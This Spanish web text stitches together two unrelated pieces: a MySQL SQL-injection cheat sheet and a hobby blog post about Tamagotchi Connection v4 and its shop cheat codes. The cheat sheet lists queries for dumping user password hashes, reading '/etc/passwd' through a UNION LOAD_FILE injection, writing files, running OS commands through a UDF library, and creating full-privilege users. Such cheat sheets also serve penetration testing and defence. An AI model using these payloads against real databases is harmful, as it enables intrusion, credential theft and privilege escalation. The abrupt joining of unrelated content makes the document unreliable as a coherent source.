| Versión | SELECT @@version |
| Comentarios | SELECT 1; #comentario SELECT /*comentario*/1; |
| Usuario Actual | SELECT user(); SELECT system_user(); |
| Listar Usuarios | SELECT user FROM mysql.user; — priv |
| Listar Hashes de Passwords | SELECT host, user, password FROM mysql.user; — priv |
| Crackear Passwords | John the Ripper crackea hashes de MySQL. |
| Listar privilegios | SELECT grantee, privilege_type, is_grantable FROM information_schema.user_privileges; — list user privs SELECT host, user, Select_priv, Insert_priv, Update_priv, Delete_priv, Create_priv, Drop_priv, Reload_priv, Shutdown_priv, Process_priv, File_priv, Grant_priv, References_priv, Index_priv, Alter_priv, Show_db_priv, Super_priv, Create_tmp_table_priv, Lock_tables_priv, Execute_priv, Repl_slave_priv, Repl_client_priv FROM mysql.user; — priv, list user privs SELECT grantee, table_schema, privilege_type FROM information_schema.schema_privileges; — list privs on databases (schemas) SELECT table_schema, table_name, column_name, privilege_type FROM information_schema.column_privileges; — list privs on columns |
| Listar cuentas DBA | SELECT grantee, privilege_type, is_grantable FROM information_schema.user_privileges WHERE privilege_type = ‘SUPER’; SELECT host, user FROM mysql.user WHERE Super_priv = ‘Y’; # priv |
| Base de Datos Actual | SELECT database() |
| Listar Bases de Datos | SELECT schema_name FROM information_schema.schemata; — for MySQL >= v5.0 SELECT distinct(db) FROM mysql.db — priv |
| Listar Columnas | SELECT table_schema, table_name, column_name FROM information_schema.columns WHERE table_schema != ‘mysql’ AND table_schema != ‘information_schema’ |
| Listar Tablas | SELECT table_schema,table_name FROM information_schema.tables WHERE table_schema != ‘mysql’ AND table_schema != ‘information_schema’ |
| Encontrar Tablas apartir de un nombre de Columna | SELECT table_schema, table_name FROM information_schema.columns WHERE column_name = ‘username’; — en cuentra las tablas con columnas llamadas ‘username’ |
| Seleccionar la N Fila | SELECT host,user FROM user ORDER BY host LIMIT 1 OFFSET 0; # filas numeradas desde 0 SELECT host,user FROM user ORDER BY host LIMIT 1 OFFSET 1; # filas numeradas desde 0 |
| Seleccionar el N caracter | SELECT substr(‘abcd’, 3, 1); # devuelve c |
| AND Bit a Bit | SELECT 6 & 2; # devuelve 2 SELECT 6 & 1; # devuelve 0 |
| Valor ASCII -> Caracter | SELECT char(65); # devuelve A |
| Char -> ASCII Value | SELECT ascii(‘A’); # returns 65 |
| Casting | SELECT cast(‘1′ AS unsigned integer); SELECT cast(‘123′ AS char); |
| Concatenación de cadenas | SELECT CONCAT(‘A’,’B’); #devuelve AB SELECT CONCAT(‘A’,’B’,’C’); # devuelve ABC |
| Sentencia IF | SELECT if(1=1,’foo’,’bar’); — devuelve ‘foo’ |
| Sentencia CASE | SELECT CASE WHEN (1=1) THEN ‘A’ ELSE ‘B’ END; # devuelve A |
| Evitar Comillas | SELECT 0×414243; # devuelve ABC |
| Demora de Tiempo | SELECT BENCHMARK(1000000,MD5(‘A’)); SELECT SLEEP(5); # >= 5.0.12 |
| Hacer Peticiones DNS | ¿Imposible? |
| Ejecución de Comandios | Si mysqld (<5.0) se ejecuta como root Y te haces con una cuenta DBA podrás ejecutar comandos del SO subiendo un archivo compartido a /usr/lib(o similar). El archivo .so debe contener una Función de Usuario Definida (UDF). raptor_udf.c explica exactamente como puedes hacerlo. Recuerda compilar para la arquitectura del objetivo pues no tiene porque ser la misma que la del atacante. |
| Acceso a Archivos Locales | …’ UNION ALL SELECT LOAD_FILE(‘/etc/passwd’) — priv, solo puede leer archivos de lectura universales. SELECT * FROM mytable INTO dumpfile ‘/tmp/somefile’; — priv, escribir en archivo de sistema |
| Hostname, Dirección IP | ¿Imposible? |
| Crear Usuarios | CREATE USER test1 IDENTIFIED BY ‘pass1′; — priv |
| Borrar Usuarios | DROP USER test1; — priv |
| Make User DBA | GRANT ALL PRIVILEGES ON *.* TO test1@’%’; — priv |
| Localización de los archivos de BD | SELECT @@datadir; |
| Default/System Databases | information_schema (>= mysql 5.0) mysql |
Tamagotchi Jinsei v4
¿ Quién no recuerda a estos trastos que causaron furor en los 90 ? Para quien no lo sepa, un Tamagotchi es una mascota virtual creada en 1996 por Aki Maita y comercializada por Bandai. Es básicamente un aparato con forma de huevo del tamaño de la palma de la mano que tiene una pantalla en blanco y negro pixelada, donde se puede ver a la mascota virtual. Se interacciona con ella mediante los tres botones que tiene abajo, y podemos realizar diferentes actividades, siendo las más básicas, y las que aparecen en todos los modelos, el alimentarle, jugar, regañar, lavarle, y vacunarle.
En las nuevas versiones se ha aumentado el número de posibles actividades a realizar con el bicho, como puede ser comunicarse con otros tamagotchis, la realización de trabajos, nuevos juegos añadidos y múltiples posibilidades de crecimiento dependiendo de nuestro trato con el tamagotchi.
De la conexión mediante el puerto de infrarrojos con otros Tamagotchis podremos crear relaciones amorosas entre ellos, que en las últimas etapas de crecimiento podrán desenvocar en hijos que criaremos tras la muerte de los padres, que por lo general suele ser a los 30 días, siempre y cuando el Tamagotchi haya sido cuidado debidamente.
Otra novedad es la posibilidad de PAUSAR el aparato (presionando ‘A’ y mientras está pulsado presionar ‘B’), por si no vamos a poder atender al bicho en un tiempo, hecho que en las antiguas versiones provocaba una muerte segura del Tamagotchi.
Sin duda lo más interesante es la posibilidad de conseguir objetos en su página web, TamaTown, y poder introducirlos en el tamagotchi en cuestión, para que el bicho interactúe con ellos. Algunos de estos objetos, necesitan ser comprados mediante puntos gotchi, que se consiguen jugando en la web, o interactuando con el Tamagotchi. En ningún caso se solicita dinero real.
Para los interesados, existe un generador de códigos online para no tener que «jugar» en la web para conseguir objetos o puntos gotchi, tán solo introducir los códigos de conexión y nuestro nombre de usuario, seleccionar lo que queremos, y generar los códigos, que deberemos introducir en el Tamagotchi. Hay que tener en cuenta que algunos de ellos no se pueden conseguir porque se supone que el Tamagotchi ha debido cumplir ciertos requisitos antes de obtener esos objetos, como es el haber conseguido ciertos trabajos, tener ascendencia o no, etc.
Existen también algunos trucos para conseguir nuevos objetos. Consisten básicamente en ir a la sección SHOP, y presionar ‘A’ tres veces seguidas rápidamente, hasta que el tendero ponga cara de asombro, en ese momento habrá que pulsar las siguientes secuencias para conseguir los objetos deseados:
1. BBCA CCCA => Pluma (15,000gp)
2. ACAB ACAC => Filete (1,400gp)
3. BAAB ACBA => !! (clon) (14,000gp)
4. CCBA AABB => Miel (Poción de Amor) (7,000gp)
5. CAAA BACB => CD3 (0gp)
Si se introducen los 5 códigos seguidos, el quinto objeto no será un CD, si no un Teléfono Móvil, que podrá utilizarse en las etapas adultas del Tamagotchi.
Hay que tener en cuenta que todo lo escrito hasta ahora solo es aplicable a las versiones 3, 4, y 4.5 de Tamagotchi Conection, pues las versiones más recientes, también llamadas Familitchi y Music Star, se desarrollan de una manera totalmente diferente, contando Familitchi con la posibilidad de criar a tres tamagotchis a la vez, que forman una familia e interactuan entre ellos, y Music Star se basa principalmente en conseguir transformar a nuestro tamagotchi en una estrella del Rock.
